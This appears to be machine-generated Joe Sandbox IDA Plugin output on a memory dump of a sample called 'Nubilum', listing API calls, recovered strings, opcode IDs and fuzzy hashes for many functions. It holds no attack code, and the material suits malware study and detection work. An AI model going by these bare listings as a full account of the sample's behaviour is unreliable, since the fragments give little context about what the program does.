                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: wcscpy$CloseCreateFileHandle
                          • String ID: General
                          • API String ID: 999786162-26480598
                          • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                          • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                          APIs
                          • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                          • _snwprintf.MSVCRT ref: 0040977D
                          • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ErrorLastMessage_snwprintf
                          • String ID: Error$Error %d: %s
                          • API String ID: 313946961-1552265934
                          • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                          • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID:
                          • String ID: foreign key constraint failed$new$oid$old
                          • API String ID: 0-1953309616
                          • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                          • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                          • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                          • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                          APIs
                          Strings
                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                          • API String ID: 3510742995-272990098
                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: gj
                          • API String ID: 1297977491-4203073231
                          • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                          • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                          APIs
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 5bf7d1a6be3c7450b3871e5cd35d64ffe6244b7c5c0165dc5567eb6e33e5d2a7
                          • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                          • Opcode Fuzzy Hash: 5bf7d1a6be3c7450b3871e5cd35d64ffe6244b7c5c0165dc5567eb6e33e5d2a7
                          • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                          APIs
                          • AreFileApisANSI.KERNEL32 ref: 00417497
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                          • malloc.MSVCRT ref: 004174BD
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                          • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                          • String ID:
                          • API String ID: 2903831945-0
                          • Opcode ID: b0e2352a19f761283a872d87c69d2b5bb205fab1a5e12f8af4558502f69ded4d
                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                          • Opcode Fuzzy Hash: b0e2352a19f761283a872d87c69d2b5bb205fab1a5e12f8af4558502f69ded4d
                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                          APIs
                          • GetParent.USER32(?), ref: 0040D453
                          • GetWindowRect.USER32(?,?), ref: 0040D460
                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Window$Rect$ClientParentPoints
                          • String ID:
                          • API String ID: 4247780290-0
                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                          • memset.MSVCRT ref: 004450CD
                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                          • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                          • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                          • String ID:
                          • API String ID: 1471605966-0
                          • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                          • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                          APIs
                          • wcscpy.MSVCRT ref: 0044475F
                          • wcscat.MSVCRT ref: 0044476E
                          • wcscat.MSVCRT ref: 0044477F
                          • wcscat.MSVCRT ref: 0044478E
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                          • String ID: \StringFileInfo\
                          • API String ID: 102104167-2245444037
                          • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                          • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                          • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                          • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                          • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy$??3@
                          • String ID: g4@
                          • API String ID: 3314356048-2133833424
                          • Opcode ID: f4c62748892297cca6d0161f710da18fe8111e273cfe50514a2a3d701446a6bb
                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                          • Opcode Fuzzy Hash: f4c62748892297cca6d0161f710da18fe8111e273cfe50514a2a3d701446a6bb
                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                          APIs
                          • GetSystemMetrics.USER32(00000000), ref: 00401990
                          • GetSystemMetrics.USER32(00000001), ref: 0040199B
                          • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: MetricsSystem$PlacementWindow
                          • String ID: AE
                          • API String ID: 3548547718-685266089
                          • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                          • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                          • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                          • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _memicmpwcslen
                          • String ID: @@@@$History
                          • API String ID: 1872909662-685208920
                          • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                          • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                          • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                          • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                          APIs
                          • memset.MSVCRT ref: 004100FB
                          • memset.MSVCRT ref: 00410112
                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                          • _snwprintf.MSVCRT ref: 00410141
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$_snwprintf_wcslwrwcscpy
                          • String ID: </%s>
                          • API String ID: 3400436232-259020660
                          • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                          • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                          APIs
                          • memset.MSVCRT ref: 0040E770
                          • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: MessageSendmemset
                          • String ID: AE$"
                          • API String ID: 568519121-1989281832
                          • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                          • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                          APIs
                          • memset.MSVCRT ref: 0040D58D
                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ChildEnumTextWindowWindowsmemset
                          • String ID: caption
                          • API String ID: 1523050162-4135340389
                          • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                          • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                          APIs
                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                          • String ID: MS Sans Serif
                          • API String ID: 210187428-168460110
                          • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                          • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ClassName_wcsicmpmemset
                          • String ID: edit
                          • API String ID: 2747424523-2167791130
                          • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                          • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                          • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                          • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                          • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                          • String ID: SHAutoComplete$shlwapi.dll
                          • API String ID: 3150196962-1506664499
                          • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                          • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                          • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                          • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy$memcmp
                          • String ID:
                          • API String ID: 3384217055-0
                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                          APIs
                          Memory Dump Source
